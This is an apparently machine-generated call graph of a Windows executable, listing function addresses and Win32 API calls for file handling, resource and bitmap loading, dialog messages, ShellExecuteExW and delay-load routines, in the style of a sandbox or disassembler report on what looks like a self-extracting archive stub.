SetEnvironmentVariableW 23686->23687 23687->23685 23765 8a4065 23688->23765 23691 8bb6dd LoadBitmapW 23692 8bb70b GetObjectW 23691->23692 23693 8bb6fe 23691->23693 23695 8bb71a 23692->23695 23842 8ba6c2 FindResourceW 23693->23842 23837 8ba5c6 23695->23837 23698 8bb770 23710 8ada42 23698->23710 23699 8bb74c 23858 8ba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23699->23858 23701 8ba6c2 13 API calls 23703 8bb73d 23701->23703 23703->23699 23705 8bb743 DeleteObject 23703->23705 23704 8bb754 23859 8ba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23704->23859 23705->23699 23707 8bb75d 23860 8ba80c 8 API calls 23707->23860 23709 8bb764 DeleteObject 23709->23698 23871 8ada67 23710->23871 23715 8b90b7 24004 8beb38 23715->24004 23719 8bacab GdiplusShutdown CoUninitialize 23718->23719 23719->23546 23721->23538 23722->23544 23724 8b086d GetModuleHandleW 23723->23724 23724->23627 23724->23628 23726 8ab15a GetVersionExW 23725->23726 23727 8ab196 23725->23727 23726->23727 23727->23644 23729 8bec50 23728->23729 23730 8b0828 GetSystemDirectoryW 23729->23730 23731 8b085e 23730->23731 23732 8b0840 23730->23732 23731->23644 23733 8b0851 LoadLibraryW 23732->23733 23733->23731 23734->23634 23736 8ae627 23735->23736 23741 8ae648 23736->23741 23740 8c3e1b 23739->23740 23740->23665 23740->23740 23747 8ad9b0 23741->23747 23744 8ae66b LoadStringW 23745 8ae645 23744->23745 23746 8ae682 LoadStringW 23744->23746 23745->23668 23746->23745 23752 8ad8ec 23747->23752 23749 8ad9cd 23751 8ad9e2 23749->23751 23760 8ad9f0 26 API calls 23749->23760 23751->23744 23751->23745 23753 8ad904 23752->23753 23759 8ad984 _strncpy 23752->23759 23755 8ad928 23753->23755 23761 8b1da7 WideCharToMultiByte 23753->23761 23758 8ad959 23755->23758 23762 8ae5b1 50 API calls __vsnprintf 23755->23762 23763 8c6159 26 API calls 3 library calls 23758->23763 23759->23749 23760->23751 23761->23755 23762->23758 23763->23759 23764->23679 23766 8a407c __vsnwprintf_l 23765->23766 23769 8c5fd4 23766->23769 23772 8c4097 23769->23772 23773 8c40bf 23772->23773 23776 8c40d7 23772->23776 23789 8c91a8 20 API calls __dosmaperr 23773->23789 23775 8c40df 23791 8c4636 23775->23791 23776->23773 23776->23775 23777 8c40c4 23790 8c9087 26 API calls __cftof 23777->23790 23781 8bfbbc _ValidateLocalCookies 5 API calls 23784 8a4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23781->23784 23783 8c4167 23800 8c49e6 51 API calls 3 library calls 23783->23800 23784->23691 23787 8c40cf 23787->23781 23788 8c4172 23801 8c46b9 20 API calls _free 23788->23801 23789->23777 23790->23787 23792 8c4653 23791->23792 23798 8c40ef 23791->23798 23792->23798 23802 8c97e5 GetLastError 23792->23802 23794 8c4674 23823 8c993a 38 API calls __cftof 23794->23823 23796 8c468d 23824 8c9967 38 API calls __cftof 23796->23824 23799 8c4601 20 API calls 2 library calls 23798->23799 23799->23783 23800->23788 23801->23787 23803 8c97fb 23802->23803 23804 8c9807 23802->23804 23825 8cae5b 11 API calls 2 library calls 23803->23825 23826 8cb136 20 API calls 2 library calls 23804->23826 23807 8c9813 23814 8c981b 23807->23814 23833 8caeb1 11 API calls 2 library calls 23807->23833 23808 8c9801 23808->23804 23809 8c9850 SetLastError 23808->23809 23809->23794 23812 8c9830 23812->23814 23815 8c9837 23812->23815 23813 8c9821 23816 8c985c SetLastError 23813->23816 23827 8c8dcc 23814->23827 23834 8c9649 20 API calls _abort 23815->23834 23835 8c8d24 38 API calls _abort 23816->23835 23819 8c9842 23821 8c8dcc _free 20 API calls 23819->23821 23822 8c9849 23821->23822 23822->23809 23822->23816 23823->23796 23824->23798 23825->23808 23826->23807 23828 8c8dd7 RtlFreeHeap 23827->23828 23832 8c8e00 __dosmaperr 23827->23832 23829 8c8dec 23828->23829 23828->23832 23836 8c91a8 20 API calls __dosmaperr 23829->23836 23831 8c8df2 GetLastError 23831->23832 23832->23813 23833->23812 23834->23819 23836->23831 23861 8ba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23837->23861 23839 8ba5cd 23840 8ba5d9 23839->23840 23862 8ba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23839->23862 23840->23698 23840->23699 23840->23701 23843 8ba7d3 23842->23843 23844 8ba6e5 SizeofResource 23842->23844 23843->23692 23843->23695 23844->23843 23845 8ba6fc LoadResource 23844->23845 23845->23843 23846 8ba711 LockResource 23845->23846 23846->23843 23847 8ba722 GlobalAlloc 23846->23847 23847->23843 23848 8ba73d GlobalLock 23847->23848 23849 8ba7cc GlobalFree 23848->23849 23850 8ba74c __InternalCxxFrameHandler 23848->23850 23849->23843 23851 8ba754 CreateStreamOnHGlobal 23850->23851 23852 8ba76c 23851->23852 23853 8ba7c5 GlobalUnlock 23851->23853 23863 8ba626 GdipAlloc 23852->23863 23853->23849 23856 8ba79a GdipCreateHBITMAPFromBitmap 23857 8ba7b0 23856->23857 23857->23853 23858->23704 23859->23707 23860->23709 23861->23839 23862->23840 23864 8ba638 23863->23864 23865 8ba645 23863->23865 23867 8ba3b9 23864->23867 23865->23853 23865->23856 23865->23857 23868 8ba3da GdipCreateBitmapFromStreamICM 23867->23868 23869 8ba3e1 GdipCreateBitmapFromStream 23867->23869 23870 8ba3e6 23868->23870 23869->23870 23870->23865 23872 8ada75 __EH_prolog 23871->23872 23873 8adaa4 GetModuleFileNameW 23872->23873 23874 8adad5 23872->23874 23875 8adabe 23873->23875 23917 8a98e0 23874->23917 23875->23874 23878 8adb31 23928 8c6310 23878->23928 23879 8ae261 78 API calls 23882 8adb05 23879->23882 23882->23878 23882->23879 23909 8add4a 23882->23909 23883 8adb44 23884 8c6310 26 API calls 23883->23884 23887 8adb56 ___vcrt_InitializeCriticalSectionEx 23884->23887 23892 8adc85 23887->23892 23887->23909 23942 8a9e80 23887->23942 23958 8a9bd0 23887->23958 23963 8a9d70 81 API calls 23887->23963 23889 8adc9f ___std_exception_copy 23890 8a9bd0 82 API calls 23889->23890 23889->23909 23893 8adcc8 ___std_exception_copy 23890->23893 23892->23909 23964 8a9d70 81 API calls 23892->23964 23893->23909 23912 8adcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 23893->23912 23965 8b1b84 MultiByteToWideChar 23893->23965 23895 8ae159 23899 8ae1de 23895->23899 23971 8c8cce 26 API calls 2 library calls 23895->23971 23897 8ae16e 23972 8c7625 26 API calls 2 library calls 23897->23972 23900 8ae214 23899->23900 23903 8ae261 78 API calls 23899->23903 23904 8c6310 26 API calls 23900->23904 23902 8ae1c6 23973 8ae27c 78 API calls 23902->23973 23903->23899 23906 8ae22d 23904->23906 23907 8c6310 26 API calls 23906->23907 23907->23909 23951 8a959a 23909->23951 23911 8b1da7 WideCharToMultiByte 23911->23912 23912->23895 23912->23909 23912->23911 23966 8ae5b1 50 API calls __vsnprintf 23912->23966 23967 8c6159 26 API calls 3 library calls 23912->23967 23968 8c8cce 26 API calls 2 library calls 23912->23968 23969 8c7625 26 API calls 2 library calls 23912->23969 23970 8ae27c 78 API calls 23912->23970 23915 8ae29e GetModuleHandleW FindResourceW 23916 8ada55 23915->23916 23916->23715 23918 8a98ea 23917->23918 23919 8a994b CreateFileW 23918->23919 23920 8a996c GetLastError 23919->23920 23923 8a99bb 23919->23923 23974 8abb03 23920->23974 23922 8a998c 23922->23923 23925 8a9990 CreateFileW GetLastError 23922->23925 23924 8a99ff 23923->23924 23926 8a99e5 SetFileTime 23923->23926 23924->23882 23925->23923 23927 8a99b5 23925->23927 23926->23924 23927->23923 23929 8c6349 23928->23929 23930 8c634d 23929->23930 23941 8c6375 23929->23941 23978 8c91a8 20 API calls __dosmaperr 23930->23978 23932 8c6699 23934 8bfbbc _ValidateLocalCookies 5 API calls 23932->23934 23933 8c6352 23979 8c9087 26 API calls __cftof 23933->23979 23936 8c66a6 23934->23936 23936->23883 23937 8c635d 23938 8bfbbc _ValidateLocalCookies 5 API calls 23937->23938 23940 8c6369 23938->23940 23940->23883 23941->23932 23980 8c6230 5 API calls _ValidateLocalCookies 23941->23980 23943 8a9ea5 23942->23943 23945 8a9e92 23942->23945 23944 8a9eb0 23943->23944 23947 8a9eb8 SetFilePointer 23943->23947 23944->23887 23945->23944 23981 8a6d5b 77 API calls 23945->23981 23947->23944 23948 8a9ed4 GetLastError 23947->23948 23948->23944 23949 8a9ede 23948->23949 23949->23944 23982 8a6d5b 77 API calls 23949->23982 23952 8a95be 23951->23952 23953 8a95cf 23951->23953 23952->23953 23954 8a95ca 23952->23954 23955 8a95d1 23952->23955 23953->23915 23983 8a974e 23954->23983 23988 8a9620 23955->23988 23959 8a9bdc 23958->23959 23961 8a9be3 23958->23961 23959->23887 23961->23959 23962 8a9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23961->23962 24003 8a6d1a 77 API calls 23961->24003 23962->23961 23963->23887 23964->23889 23965->23912 23966->23912 23967->23912 23968->23912 23969->23912 23970->23912 23971->23897 23972->23902 23973->23899 23975 8abb10 _wcslen 23974->23975 23976 8abbb8 GetCurrentDirectoryW 23975->23976 23977 8abb39 _wcslen 23975->23977 23976->23977 23977->23922 23978->23933 23979->23937 23980->23941 23981->23943 23982->23944 23984 8a9781 23983->23984 23985 8a9757 23983->23985 23984->23953 23985->23984 23994 8aa1e0 23985->23994 23989 8a964a 23988->23989 23990 8a962c 23988->23990 23991 8a9669 23989->23991 24002 8a6bd5 76 API calls 23989->24002 23990->23989 23992 8a9638 CloseHandle 23990->23992 23991->23953 23992->23989 23995 8bec50 23994->23995 23996 8aa1ed DeleteFileW 23995->23996 23997 8a977f 23996->23997 23998 8aa200 23996->23998 23997->23953 23999 8abb03 GetCurrentDirectoryW 23998->23999 24000 8aa214 23999->24000 24000->23997 24001 8aa218 DeleteFileW 24000->24001 24001->23997 24002->23991 24003->23961 24005 8beb3d ___std_exception_copy 24004->24005 24006 8b90d6 24005->24006 24009 8beb59 24005->24009 24013 8c7a5e 7 API calls 2 library calls 24005->24013 24006->23530 24008 8bf5c9 24015 8c238d RaiseException 24008->24015 24009->24008 24014 8c238d RaiseException 24009->24014 24012 8bf5e6 24013->24005 24014->24008 24015->24012 24017 8c7ce1 _abort 24016->24017 24018 8c7ce8 24017->24018 24019 8c7cfa 24017->24019 24052 8c7e2f GetModuleHandleW 24018->24052 24040 8cac31 EnterCriticalSection 24019->24040 24022 8c7ced 24022->24019 24053 8c7e73 GetModuleHandleExW 24022->24053 24027 8c7d01 24037 8c7d9f 24027->24037 24039 8c7d76 24027->24039 24061 8c87e0 20 API calls _abort 24027->24061 24028 8c7dbc 24044 8c7dee 24028->24044 24029 8c7de8 24062 8d2390 5 API calls _ValidateLocalCookies 24029->24062 24031 8c8a91 _abort 5 API calls 24036 8c7d8e 24031->24036 24032 8c8a91 _abort 5 API calls 24032->24037 24036->24032 24041 8c7ddf 24037->24041 24039->24031 24039->24036 24040->24027 24063 8cac81 LeaveCriticalSection 24041->24063 24043 8c7db8 24043->24028 24043->24029 24064 8cb076 24044->24064 24047 8c7e1c 24050 8c7e73 _abort 8 API calls 24047->24050 24048 8c7dfc GetPEB 24048->24047 24049 8c7e0c GetCurrentProcess TerminateProcess 24048->24049 24049->24047 24051 8c7e24 ExitProcess 24050->24051 24052->24022 24054 8c7e9d GetProcAddress 24053->24054 24055 8c7ec0 24053->24055 24058 8c7eb2 24054->24058 24056 8c7ecf 24055->24056 24057 8c7ec6 FreeLibrary 24055->24057 24059 8bfbbc _ValidateLocalCookies 5 API calls 24056->24059 24057->24056 24058->24055 24060 8c7cf9 24059->24060 24060->24019 24061->24039 24063->24043 24065 8cb09b 24064->24065 24066 8cb091 24064->24066 24070 8cac98 24065->24070 24068 8bfbbc _ValidateLocalCookies 5 API calls 24066->24068 24069 8c7df8 24068->24069 24069->24047 24069->24048 24071 8cacc4 24070->24071 24072 8cacc8 24070->24072 24071->24072 24074 8cace8 24071->24074 24077 8cad34 24071->24077 24072->24066 24074->24072 24075 8cacf4 GetProcAddress 24074->24075 24076 8cad04 _abort 24075->24076 24076->24072 24078 8cad55 LoadLibraryExW 24077->24078 24082 8cad4a 24077->24082 24079 8cad8a 24078->24079 24080 8cad72 GetLastError 24078->24080 24079->24082 24083 8cada1 FreeLibrary 24079->24083 24080->24079 24081 8cad7d LoadLibraryExW 24080->24081 24081->24079 24082->24071 24083->24082 24084 8be5b1 24086 8be578 24084->24086 24087 8be85d 24086->24087 24113 8be5bb 24087->24113 24089 8be86d 24090 8be8ca 24089->24090 24091 8be8ee 24089->24091 24092 8be7fb DloadReleaseSectionWriteAccess 6 API calls 24090->24092 24094 8be966 LoadLibraryExA 24091->24094 24096 8be9c7 24091->24096 24097 8be9d9 24091->24097 24103 8bea95 24091->24103 24093 8be8d5 RaiseException 24092->24093 24108 8beac3 24093->24108 24095 8be979 GetLastError 24094->24095 24094->24096 24099 8be9a2 24095->24099 24106 8be98c 24095->24106 24096->24097 24098 8be9d2 FreeLibrary 24096->24098 24100 8bea37 GetProcAddress 24097->24100 24097->24103 24098->24097 24102 8be7fb DloadReleaseSectionWriteAccess 6 API calls 24099->24102 24101 8bea47 GetLastError 24100->24101 24100->24103 24104 8bea5a 24101->24104 24107 8be9ad RaiseException 24102->24107 24122 8be7fb 24103->24122 24104->24103 24109 8be7fb DloadReleaseSectionWriteAccess 6 API calls 24104->24109 24106->24096 24106->24099 24107->24108 24108->24086 24110 8bea7b RaiseException 24109->24110 24111 8be5bb ___delayLoadHelper2@8 6 API calls 24110->24111 24112 8bea92 24111->24112 24112->24103 24114 8be5ed 24113->24114 24115 8be5c7 24113->24115 24114->24089 24130 8be664 24115->24130 24117 8be5cc 24118 8be5e8 24117->24118 24133 8be78d 24117->24133 24138 8be5ee GetModuleHandleW GetProcAddress GetProcAddress 24118->24138 24121 8be836 24121->24089 24123 8be82f 24122->24123 24124 8be80d 24122->24124 24123->24108 24125 8be664 DloadReleaseSectionWriteAccess 3 API calls 24124->24125 24126 8be812 24125->24126 24127 8be82a 24126->24127 24128 8be78d DloadProtectSection 3 API calls 24126->24128 24141 8be831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24127->24141 24128->24127 24139 8be5ee GetModuleHandleW GetProcAddress GetProcAddress 24130->24139 24132 8be669 24132->24117 24134 8be7a2 DloadProtectSection 24133->24134 24135 8be7dd VirtualProtect 24134->24135 24136 8be7a8 24134->24136 24140 8be6a3 VirtualQuery GetSystemInfo 24134->24140 24135->24136 24136->24118 24138->24121 24139->24132 24140->24135 24141->24123 25382 8bb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25405 8b62ca 123 API calls __InternalCxxFrameHandler 24147 8bdec2 24148 8bdecf 24147->24148 24149 8ae617 53 API calls 24148->24149 24150 8bdedc 24149->24150 24151 8a4092 _swprintf 51 API calls 24150->24151 24152 8bdef1 SetDlgItemTextW 24151->24152 24155 8bb568 PeekMessageW 24152->24155 24156 8bb5bc 24155->24156 24157 8bb583 GetMessageW 24155->24157 24158 8bb599 IsDialogMessageW 24157->24158 24159 8bb5a8 TranslateMessage DispatchMessageW 24157->24159 24158->24156 24158->24159 24159->24156 25384 8bb5c0 100 API calls 25424 8b77c0 118 API calls 25425 8bffc0 RaiseException _com_error::_com_error CallUnexpected 25407 8c0ada 51 API calls 2 library calls 25351 8bf4d3 20 API calls 24266 8be1d1 14 API calls ___delayLoadHelper2@8 24268 8be2d7 24269 8be1db 24268->24269 24270 8be85d ___delayLoadHelper2@8 14 API calls 24269->24270 24270->24269 25426 8ca3d0 21 API calls 2 library calls 25427 8d2bd0 VariantClear 24272 8a10d5 24277 8a5abd 24272->24277 24278 8a5ac7 __EH_prolog 24277->24278 24284 8ab505 24278->24284 24280 8a5ad3 24290 8a5cac GetCurrentProcess GetProcessAffinityMask 24280->24290 24285 8ab50f __EH_prolog 24284->24285 24291 8af1d0 82 API calls 24285->24291 24287 8ab521 24292 8ab61e 24287->24292 24291->24287 24293 8ab630 __cftof 24292->24293 24296 8b10dc 24293->24296 24299 8b109e GetCurrentProcess GetProcessAffinityMask 24296->24299 24300 8ab597 24299->24300 24300->24280 25386 8af1e8 FreeLibrary 24455 8bb7e0 24456 8bb7ea __EH_prolog 24455->24456 24623 8a1316 24456->24623 24459 8bb82a 24461 8bb841 24459->24461 24464 8bb838 24459->24464 24467 8bb89b 24459->24467 24460 8bbf0f 24688 8bd69e 24460->24688 24469 8bb878 24464->24469 24470 8bb83c 24464->24470 24465 8bbf2a SendMessageW 24466 8bbf38 24465->24466 24471 8bbf52 GetDlgItem SendMessageW 24466->24471 24472 8bbf41 SendDlgItemMessageW 24466->24472 24468 8bb92e GetDlgItemTextW 24467->24468 24474 8bb8b1 24467->24474 24468->24469 24473 8bb96b 24468->24473 24469->24461 24477 8bb95f KiUserCallbackDispatcher 24469->24477 24470->24461 24475 8ae617 53 API calls 24470->24475 24706 8ba64d GetCurrentDirectoryW 24471->24706 24472->24471 24478 8bb980 GetDlgItem 24473->24478 24479 8bb974 24473->24479 24480 8ae617 53 API calls 24474->24480 24481 8bb85b 24475->24481 24477->24461 24483 8bb9b7 SetFocus 24478->24483 24484 8bb994 SendMessageW SendMessageW 24478->24484 24479->24469 24492 8bbe55 24479->24492 24485 8bb8ce SetDlgItemTextW 24480->24485 24728 8a124f SHGetMalloc 24481->24728 24482 8bbf82 GetDlgItem 24487 8bbf9f 24482->24487 24488 8bbfa5 SetWindowTextW 24482->24488 24489 8bb9c7 24483->24489 24501 8bb9e0 24483->24501 24484->24483 24490 8bb8d9 24485->24490 24487->24488 24707 8babab GetClassNameW 24488->24707 24491 8ae617 53 API calls 24489->24491 24490->24461 24494 8bb8e6 GetMessageW 24490->24494 24495 8bb9d1 24491->24495 24496 8ae617 53 API calls 24492->24496 24494->24461 24498 8bb8fd IsDialogMessageW 24494->24498 24729 8bd4d4 24495->24729 24502 8bbe65 SetDlgItemTextW 24496->24502 24498->24490 24504 8bb90c TranslateMessage DispatchMessageW 24498->24504 24500 8bc1fc SetDlgItemTextW 24500->24461 24507 8ae617 53 API calls 24501->24507 24505 8bbe79 24502->24505 24504->24490 24509 8ae617 53 API calls 24505->24509 24508 8bba17 24507->24508 24515 8a4092 _swprintf 51 API calls 24508->24515 24542 8bbe9c _wcslen 24509->24542 24510 8bbff0 24514 8bc020 24510->24514 24517 8ae617 53 API calls 24510->24517 24511 8bb9d9 24633 8aa0b1 24511->24633 24512 8bc73f 97 API calls 24512->24510 24522 8bc73f 97 API calls 24514->24522 24575 8bc0d8 24514->24575 24518 8bba29 24515->24518 24521 8bc003 SetDlgItemTextW 24517->24521 24524 8bd4d4 16 API calls 24518->24524 24519 8bba73 24639 8bac04 SetCurrentDirectoryW 24519->24639 24520 8bba68 GetLastError 24520->24519 24528 8ae617 53 API calls 24521->24528 24530 8bc03b 24522->24530 24523 8bc18b 24525 8bc19d 24523->24525 24526 8bc194 EnableWindow 24523->24526 24524->24511 24531 8bc1ba 24525->24531 24747 8a12d3 GetDlgItem EnableWindow 24525->24747 24526->24525 24527 8bbeed 24534 8ae617 53 API calls 24527->24534 24532 8bc017 SetDlgItemTextW 24528->24532 24540 8bc04d 24530->24540 24567 8bc072 24530->24567 24537 8bc1e1 24531->24537 24551 8bc1d9 SendMessageW 24531->24551 24532->24514 24533 8bba87 24538 8bba9e 24533->24538 24539 8bba90 GetLastError 24533->24539 24534->24461 24535 8bc0cb 24543 8bc73f 97 API calls 24535->24543 24537->24461 24552 8ae617 53 API calls 24537->24552 24544 8bbb11 24538->24544 24547 8bbb20 24538->24547 24553 8bbaae GetTickCount 24538->24553 24539->24538 24745 8b9ed5 32 API calls 24540->24745 24541 8bc1b0 24748 8a12d3 GetDlgItem EnableWindow 24541->24748 24542->24527 24546 8ae617 53 API calls 24542->24546 24543->24575 24544->24547 24548 8bbd56 24544->24548 24554 8bbed0 24546->24554 24556 8bbcfb 24547->24556 24557 8bbb39 GetModuleFileNameW 24547->24557 24558 8bbcf1 24547->24558 24648 8a12f1 GetDlgItem ShowWindow 24548->24648 24549 8bc066 24549->24567 24551->24537 24560 8bb862 24552->24560 24561 8a4092 _swprintf 51 API calls 24553->24561 24563 8a4092 _swprintf 51 API calls 24554->24563 24555 8bc169 24746 8b9ed5 32 API calls 24555->24746 24566 8ae617 53 API calls 24556->24566 24739 8af28c 82 API calls 24557->24739 24558->24469 24558->24556 24560->24461 24560->24500 24562 8bbac7 24561->24562 24640 8a966e 24562->24640 24563->24527 24572 8bbd05 24566->24572 24567->24535 24573 8bc73f 97 API calls 24567->24573 24568 8bbd66 24649 8a12f1 GetDlgItem ShowWindow 24568->24649 24569 8ae617 53 API calls 24569->24575 24570 8bc188 24570->24523 24571 8bbb5f 24576 8a4092 _swprintf 51 API calls 24571->24576 24577 8a4092 _swprintf 51 API calls 24572->24577 24578 8bc0a0 24573->24578 24575->24523 24575->24555 24575->24569 24582 8bbb81 CreateFileMappingW 24576->24582 24583 8bbd23 24577->24583 24578->24535 24584 8bc0a9 DialogBoxParamW 24578->24584 24579 8bbd70 24580 8ae617 53 API calls 24579->24580 24585 8bbd7a SetDlgItemTextW 24580->24585 24587 8bbbe3 GetCommandLineW 24582->24587 24618 8bbc60 __InternalCxxFrameHandler 24582->24618 24596 8ae617 53 API calls 24583->24596 24584->24469 24584->24535 24650 8a12f1 GetDlgItem ShowWindow 24585->24650 24586 8bbaed 24590 8bbaff 24586->24590 24591 8bbaf4 GetLastError 24586->24591 24592 8bbbf4 24587->24592 24588 8bbc6b ShellExecuteExW 24613 8bbc88 24588->24613 24594 8a959a 80 API calls 24590->24594 24591->24590 24740 8bb425 SHGetMalloc 24592->24740 24593 8bbd8c SetDlgItemTextW GetDlgItem 24597 8bbda9 GetWindowLongW SetWindowLongW 24593->24597 24598 8bbdc1 24593->24598 24594->24544 24600 8bbd3d 24596->24600 24597->24598 24651 8bc73f 24598->24651 24599 8bbc10 24741 8bb425 SHGetMalloc 24599->24741 24604 8bbc1c 24742 8bb425 SHGetMalloc 24604->24742 24605 8bbccb 24605->24558 24611 8bbce1 UnmapViewOfFile CloseHandle 24605->24611 24606 8bc73f 97 API calls 24608 8bbddd 24606->24608 24676 8bda52 24608->24676 24609 8bbc28 24743 8af3fa 82 API calls 2 library calls 24609->24743 24611->24558 24613->24605 24616 8bbcb7 Sleep 24613->24616 24615 8bbc3f MapViewOfFile 24615->24618 24616->24605 24616->24613 24617 8bc73f 97 API calls 24621 8bbe03 24617->24621 24618->24588 24619 8bbe2c 24744 8a12d3 GetDlgItem EnableWindow 24619->24744 24621->24619 24622 8bc73f 97 API calls 24621->24622 24622->24619 24624 8a1378 24623->24624 24625 8a131f 24623->24625 24750 8ae2c1 GetWindowLongW SetWindowLongW 24624->24750 24627 8a1385 24625->24627 24749 8ae2e8 62 API calls 2 library calls 24625->24749 24627->24459 24627->24460 24627->24461 24629 8a1341 24629->24627 24630 8a1354 GetDlgItem 24629->24630 24630->24627 24631 8a1364 24630->24631 24631->24627 24632 8a136a SetWindowTextW 24631->24632 24632->24627 24635 8aa0bb 24633->24635 24634 8aa14c 24636 8aa2b2 8 API calls 24634->24636 24638 8aa175 24634->24638 24635->24634 24635->24638 24751 8aa2b2 24635->24751 24636->24638 24638->24519 24638->24520 24639->24533 24641 8a9678 24640->24641 24642 8a96d5 CreateFileW 24641->24642 24643 8a96c9 24641->24643 24642->24643 24644 8a971f 24643->24644 24645 8abb03 GetCurrentDirectoryW 24643->24645 24644->24586 24646 8a9704 24645->24646 24646->24644 24647 8a9708 CreateFileW 24646->24647 24647->24644 24648->24568 24649->24579 24650->24593 24652 8bc749 __EH_prolog 24651->24652 24653 8bbdcf 24652->24653 24654 8bb314 ExpandEnvironmentStringsW 24652->24654 24653->24606 24665 8bc780 _wcslen _wcsrchr 24654->24665 24656 8bb314 ExpandEnvironmentStringsW 24656->24665 24657 8bca67 SetWindowTextW 24657->24665 24660 8c3e3e 22 API calls 24660->24665 24662 8bc855 SetFileAttributesW 24664 8bc90f GetFileAttributesW 24662->24664 24675 8bc86f __cftof _wcslen 24662->24675 24664->24665 24667 8bc921 DeleteFileW 24664->24667 24665->24653 24665->24656 24665->24657 24665->24660 24665->24662 24668 8bcc31 GetDlgItem SetWindowTextW SendMessageW 24665->24668 24671 8bcc71 SendMessageW 24665->24671 24772 8b1fbb CompareStringW 24665->24772 24773 8ba64d GetCurrentDirectoryW 24665->24773 24775 8aa5d1 6 API calls 24665->24775 24776 8aa55a FindClose 24665->24776 24777 8bb48e 76 API calls 2 library calls 24665->24777 24667->24665 24669 8bc932 24667->24669 24668->24665 24670 8a4092 _swprintf 51 API calls 24669->24670 24672 8bc952 GetFileAttributesW 24670->24672 24671->24665 24672->24669 24673 8bc967 MoveFileW 24672->24673 24673->24665 24674 8bc97f MoveFileExW 24673->24674 24674->24665 24675->24664 24675->24665 24774 8ab991 51 API calls 2 library calls 24675->24774 24677 8bda5c __EH_prolog 24676->24677 24778 8b0659 24677->24778 24679 8bda8d 24782 8a5b3d 24679->24782 24681 8bdaab 24786 8a7b0d 24681->24786 24685 8bdafe 24802 8a7b9e 24685->24802 24687 8bbdee 24687->24617 24689 8bd6a8 24688->24689 24690 8ba5c6 4 API calls 24689->24690 24691 8bd6ad 24690->24691 24692 8bbf15 24691->24692 24693 8bd6b5 GetWindow 24691->24693 24692->24465 24692->24466 24693->24692 24699 8bd6d5 24693->24699 24694 8bd6e2 GetClassNameW 25267 8b1fbb CompareStringW 24694->25267 24696 8bd76a GetWindow 24696->24692 24696->24699 24697 8bd706 GetWindowLongW 24697->24696 24698 8bd716 SendMessageW 24697->24698 24698->24696 24700 8bd72c GetObjectW 24698->24700 24699->24692 24699->24694 24699->24696 24699->24697 25268 8ba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24700->25268 24702 8bd743 25269 8ba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24702->25269 25270 8ba80c 8 API calls 24702->25270 24705 8bd754 SendMessageW DeleteObject 24705->24696 24706->24482 24708 8babcc 24707->24708 24709 8babf1 24707->24709 25271 8b1fbb CompareStringW 24708->25271 24710 8babff 24709->24710 24711 8babf6 SHAutoComplete 24709->24711 24715 8bb093 24710->24715 24711->24710 24713 8babdf 24713->24709 24714 8babe3 FindWindowExW 24713->24714 24714->24709 24716 8bb09d __EH_prolog 24715->24716 24717 8a13dc 84 API calls 24716->24717 24718 8bb0bf 24717->24718 25272 8a1fdc 24718->25272 24721 8bb0eb 24724 8a19af 128 API calls 24721->24724 24722 8bb0d9 24723 8a1692 86 API calls 24722->24723 24726 8bb0e4 24723->24726 24727 8bb10d __InternalCxxFrameHandler ___std_exception_copy 24724->24727 24725 8a1692 86 API calls 24725->24726 24726->24510 24726->24512 24727->24725 24728->24560 24730 8bb568 5 API calls 24729->24730 24731 8bd4e0 GetDlgItem 24730->24731 24732 8bd502 24731->24732 24733 8bd536 SendMessageW SendMessageW 24731->24733 24738 8bd50d ShowWindow SendMessageW SendMessageW 24732->24738 24734 8bd572 24733->24734 24735 8bd591 SendMessageW SendMessageW SendMessageW 24733->24735 24734->24735 24736 8bd5e7 SendMessageW 24735->24736 24737 8bd5c4 SendMessageW 24735->24737 24736->24511 24737->24736 24738->24733 24739->24571 24740->24599 24741->24604 24742->24609 24743->24615 24744->24479 24745->24549 24746->24570 24747->24541 24748->24531 24749->24629 24750->24627 24752 8aa2bf 24751->24752 24753 8aa2e3 24752->24753 24754 8aa2d6 CreateDirectoryW 24752->24754 24755 8aa231 3 API calls 24753->24755 24754->24753 24758 8aa316 24754->24758 24756 8aa2e9 24755->24756 24757 8aa329 GetLastError 24756->24757 24760 8abb03 GetCurrentDirectoryW 24756->24760 24759 8aa325 24757->24759 24758->24759 24764 8aa4ed 24758->24764 24759->24635 24762 8aa2ff 24760->24762 24762->24757 24763 8aa303 CreateDirectoryW 24762->24763 24763->24757 24763->24758 24765 8bec50 24764->24765 24766 8aa4fa SetFileAttributesW 24765->24766 24767 8aa53d 24766->24767 24768 8aa510 24766->24768 24767->24759 24769 8abb03 GetCurrentDirectoryW 24768->24769 24770 8aa524 24769->24770 24770->24767 24771 8aa528 SetFileAttributesW 24770->24771 24771->24767 24772->24665 24773->24665 24774->24675 24775->24665 24776->24665 24777->24665 24779 8b0666 _wcslen 24778->24779 24806 8a17e9 24779->24806 24781 8b067e 24781->24679 24783 8b0659 _wcslen 24782->24783 24784 8a17e9 78 API calls 24783->24784 24785 8b067e 24784->24785 24785->24681 24787 8a7b17 __EH_prolog 24786->24787 24823 8ace40 24787->24823 24789 8a7b32 24790 8beb38 8 API calls 24789->24790 24791 8a7b5c 24790->24791 24829 8b4a76 24791->24829 24794 8a7c7d 24795 8a7c87 24794->24795 24797 8a7cf1 24795->24797 24858 8aa56d 24795->24858 24798 8a7d50 24797->24798 24836 8a8284 24797->24836 24800 8a7d92 24798->24800 24864 8a138b 74 API calls 24798->24864 24800->24685 24803 8a7bac 24802->24803 24805 8a7bb3 24802->24805 24804 8b2297 86 API calls 24803->24804 24804->24805 24807 8a17ff 24806->24807 24818 8a185a __InternalCxxFrameHandler 24806->24818 24808 8a1828 24807->24808 24819 8a6c36 76 API calls __vswprintf_c_l 24807->24819 24810 8a1887 24808->24810 24815 8a1847 ___std_exception_copy 24808->24815 24812 8c3e3e 22 API calls 24810->24812 24811 8a181e 24820 8a6ca7 75 API calls 24811->24820 24814 8a188e 24812->24814 24814->24818 24822 8a6ca7 75 API calls 24814->24822 24815->24818 24821 8a6ca7 75 API calls 24815->24821 24818->24781 24819->24811 24820->24808 24821->24818 